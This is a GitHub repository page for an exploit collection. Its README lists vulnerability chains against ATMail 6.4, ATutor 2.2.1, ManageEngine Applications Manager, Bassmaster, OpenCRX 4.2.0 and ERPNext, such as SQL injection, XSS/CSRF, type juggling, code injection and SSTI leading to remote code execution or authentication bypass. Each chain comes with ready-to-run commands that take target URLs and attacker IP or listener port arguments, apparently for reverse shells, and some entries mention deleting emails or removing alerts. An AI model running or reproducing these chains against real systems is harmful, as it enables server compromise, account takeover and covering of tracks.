Custom Exploits

A collection of scripts designed to exploit known vulnerability chains

Exploits

ATMail 6.4 Session Riding

Exploit Chain: XSS + CSRF (Session Riding) -> Insecure File Upload -> RCE (Emails Deleted)

sudo python3 atmail-xxs_file-upload_rce.py -t [ATMAIL_SERVER_IP] -a [ATTACKER_IP] -u [ATMAIL_URL] -d [ADMIN_EMAIL] -f [ATTACKER_EMAIL]

sudo python3 atmail-xss_malicious_plugin_rce.py -t 192.168.1.1 -a 192.168.2.1 -u http://atmail -d [email protected] -f [email protected]

Exploit Chain: XSS + CSRF (Session Riding) -> Upload Malicious Plugin -> RCE

sudo python3 atmail_file-upload_rce.py -t [ATMAIL_SERVER_IP] -a [ATTACKER_IP] -u [ATMAIL_URL] -d [ADMIN_EMAIL] -f [ATTACKER_EMAIL]

sudo python3 atmail_file-upload_rce.py -t 192.168.1.1 -a 192.168.2.1 -u http://atmail -d [email protected] -f [email protected]

ATutor 2.2.1

Exploit Chain: Blind SQLi -> Auth Bypass -> Insecure File Upload -> RCE

python3 atutor_2.2.1-rce.py [ATUTOR_URL]

python3 atutor_2.2.1-rce.py http://atutor-server.com

Exploit Chain: PHP Type Juggling -> Auth Bypass (confirm.php)

Targeting Confirm.php Endpoint

python atutor_magic-hash-confirm.py [EMAIL-DOMAIN] [VICTIM_ID] [PAYLOAD_LENGTH] [ATUTOR_URL]

python atutor_magic-hash-confirm.py offsec.local 3 4 http://atutor-server.com

Targeting Password_reminder.php Endpoint

python3 atutor_magic-hash-password_reminder.py [VICTIM_ID] [ATUTOR_URL]

python3 atutor_magic-hash-password_reminder.py 1 http://atutor-server.com

ManageEngine Applications Manager

Exploit Chain: Blind Time-Based SQLi -> COPY TO payload -> RCE

Targeting wmiget.vbs script through AMUserResourcesSyncServlet

python3 manage-engine_sqli_to_rce_vbs.py [TARGET] [LHOST] [LPORT]

python3 manage-engine_sqli_to_rce_vbs.py http://target-server.com 192.168.1.1 4444

Exploit Chain: Blind SQLi -> Large Object Poisoning -> Malicious UDF -> RCE

Uploading custom DLL through AMUserResourcesSyncServlet

python3 manage-engine_sqli_to_rce_large-object.py [MANAGEENGINE_DOMAIN] [LHOST] [LPORT]

python3 manage-engine_sqli_to_rce_large-object.py manageengine:8443 192.168.1.1 4444

Bassmaster (Batch Proccessing API for HTTP API (hapi) Library)

Exploit Chain: Code Injection -> RCE

python3 bassmaster_code-injection_to_rce.py [TARGET_URL] [LHOST] [LPORT]

python3 bassmaster_code-injection_to_rce.py http://bassmaster-api-server.com:8000 192.168.1.1 4444

Exploit Chain: Code Injection -> Safe-Eval 0.3.0 Bypass -> RCE

python3 bassmaster_safe-eval-bypass_rce.py [TARGET_URL] [LHOST] [LPORT]

python3 bassmaster_safe-eval-process_rce.py http://bassmaster-api-server.com:8000 192.168.1.1 4444

OpenCRX 4.2.0 Auth Bypass through Password Reset Function (Alerts Removed)

Exploit Chain: Insecure Password Reset Token Generation (java.util.Random)

python3 opencrx-auth_bypass.py -f [TARGET_URL] -u [TARGET_USERNAME] -p [NEW_PASSWORD]

python3 opencrx-auth_bypass.py -f http://opencrx.com -u admin-Standard -p p@ssw0rd12

ERPNext (Frappe / Jinja2)

Exploit Chain: SQLi -> SSTI -> RCE

python3 erpnext_auth-bypass_to_rce.py -u [TARGET_URL] -l [LHOST] -p [LPORT]

python3 erpnext_auth-bypass_to_rce.py -u http://erpnextCOM -l 192.168.1.1 -p 4444

Name		Name	Last commit message	Last commit date
Latest commit History 17 Commits
ATMail_6.4-Session-Riding		ATMail_6.4-Session-Riding
ATutor_2.2.1-RCE		ATutor_2.2.1-RCE
ATutor_2.2.1-Type-Juggling_Auth_Bypass		ATutor_2.2.1-Type-Juggling_Auth_Bypass
Bassmaster-API_Code_Injection_to_RCE		Bassmaster-API_Code_Injection_to_RCE
ERPNext-RCE		ERPNext-RCE
ManageEngine_SQLi-to-RCE		ManageEngine_SQLi-to-RCE
OpenCRX_4.2.0-Auth_Bypass		OpenCRX_4.2.0-Auth_Bypass
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Custom Exploits

Exploits

ATMail 6.4 Session Riding

ATutor 2.2.1

Targeting Confirm.php Endpoint

Targeting Password_reminder.php Endpoint

ManageEngine Applications Manager

Targeting wmiget.vbs script through AMUserResourcesSyncServlet

Uploading custom DLL through AMUserResourcesSyncServlet

Bassmaster (Batch Proccessing API for HTTP API (hapi) Library)

OpenCRX 4.2.0 Auth Bypass through Password Reset Function (Alerts Removed)

ERPNext (Frappe / Jinja2)

About

Releases

Packages

Languages

R-s0n/Custom_Exploits

Folders and files

Latest commit

History

Repository files navigation

Custom Exploits

Exploits

ATMail 6.4 Session Riding

ATutor 2.2.1

Targeting Confirm.php Endpoint

Targeting Password_reminder.php Endpoint

ManageEngine Applications Manager

Targeting wmiget.vbs script through AMUserResourcesSyncServlet

Uploading custom DLL through AMUserResourcesSyncServlet

Bassmaster (Batch Proccessing API for HTTP API (hapi) Library)

OpenCRX 4.2.0 Auth Bypass through Password Reset Function (Alerts Removed)

ERPNext (Frappe / Jinja2)

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages